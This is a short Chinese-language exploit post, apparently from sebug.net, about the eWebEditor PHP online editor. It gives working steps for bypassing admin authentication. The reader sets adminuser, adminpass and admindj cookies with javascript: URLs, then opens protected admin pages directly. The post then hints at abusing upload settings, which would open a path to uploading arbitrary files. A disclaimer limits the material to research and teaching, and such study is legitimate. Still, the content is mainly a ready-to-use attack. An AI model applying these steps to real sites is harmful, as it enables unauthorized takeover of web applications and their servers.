eWebEditor是一個所見即所得的在線編輯器�����。顧名思義���,就是能在網(wǎng)絡上使用所見即所得的編輯方式進行編輯圖文并茂的文章�、新聞�����、討論貼�����、通告�、記事等多種文字處理應用�。
../ewebeditor/admin/config.php文件
用戶認證方式存在嚴重的安全漏洞,可以直接跳過認證獲取到管理員權限����。
[www.sebug.net]
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負! 首先當然要找到登陸后臺,默認是../eWebEditor/admin/login.php,進入后臺后隨便輸入一個用戶和密碼,當然會提示出錯了.
這時候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回車,清空瀏覽器的 url,大家注意了,這次輸入的url要注意,我們這次要輸入的文件都是在正常情況下經(jīng)過驗證才能瀏覽的文件如../ewebeditor/admin /default.php
哈哈,直接進去了,利用和asp一樣,新增樣式修改上傳,就ok了
400 186 1886
